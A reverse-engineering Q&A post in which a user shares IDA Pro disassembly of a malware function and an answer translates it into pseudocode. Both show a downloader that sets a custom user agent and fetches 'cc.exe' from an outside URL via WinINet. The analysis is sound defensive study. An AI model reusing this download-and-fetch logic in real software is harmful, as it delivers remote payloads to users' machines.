ramu ranga
Reputation: 57
Unable to analyze the nature of the function in a given memory location
I'm trying to analyze malware in an executable. I'm trying to analyze the nature of the function at the subroutine sub_401040. When I ran it in IDA Pro, I got assembly code that looks something like the one that is posted below. However, I'm a bit confused on what exactly is happening at this function. Any help will be highly appreciated!
I can understand that subroutine 401040 has got a single parameter. But I'm lost trying to understand its functionality or how the parameter is being used.
sub_401040 proc near
Buffer= dword ptr -230h
var_22C= byte ptr -22Ch
hFile= dword ptr -30h
hInternet= dword ptr -2Ch
szAgent= byte ptr -28h
dwNumberOfBytesRead= dword ptr -8
var_4= dword ptr -4
arg_0= dword ptr 8
push ebp
mov ebp, esp
sub esp, 230h
mov eax, [ebp+arg_0]
push eax
push offset aInternetExplor ; "Internet Explorer 7.50/lol%d"
lea ecx, [ebp+szAgent]
push ecx ; char *
call _sprintf
add esp, 0Ch
push 0 ; dwFlags
push 0 ; lpszProxyBypass
push 0 ; lpszProxy
push 0 ; dwAccessType
lea edx, [ebp+szAgent]
push edx ; lpszAgent
call ds:InternetOpenA
mov [ebp+hInternet], eax
push 0 ; dwContext
push 0 ; dwFlags
push 0 ; dwHeadersLength
push 0 ; lpszHeaders
push offset szUrl ; "http://www.inactivedomain.com/cc.exe"
mov eax, [ebp+hInternet]
push eax ; hInternet
call ds:InternetOpenUrlA
mov [ebp+hFile], eax
cmp [ebp+hFile], 0
jnz short loc_4010B1
Upvotes: 0
Views: 259
Answers (1)
Amadeus
Reputation: 426
Basically, it's doing this (psueudocode):
sprintf(szAgent, "Internet Explorer 7.50/lol%d", arg0);
// http://msdn.microsoft.com/en-us/library/windows/desktop/aa385096(v=vs.85).aspx
// Initializes an application's use of the WinINet functions.
HINTERNET hInternet = InternetOpen(szAgent, 0, 0, 0, 0);
// http://msdn.microsoft.com/en-us/library/windows/desktop/aa385098(v=vs.85).aspx
// Opens a resource specified by a complete FTP or HTTP URL.
HINTERNET Return = InternetOpenUrl(hInternet, "http://www.inactivedomain.com/cc.exe", 0, 0, 0, 0 );
if (!Return) // etc...
Upvotes: 1
Related Questions
- IDA not identifying statically compiled functions
- Practical Malware Analysis - Lab 5.1 Question 11 function sub_100036C3
- Finding a function in a disassembly
- Address used by a function pointer
- How to read AddressOfEntryPoint in memory
- Debugging malicious program
- How to analyze the function call (sub_41A1b8) for solving crackme with IDA Pro?
- Disassembling c function in Ida pro
- How to determine memory address of non-exported function in windows executable process?
- Inconsistent function pointer address with what the debugger shows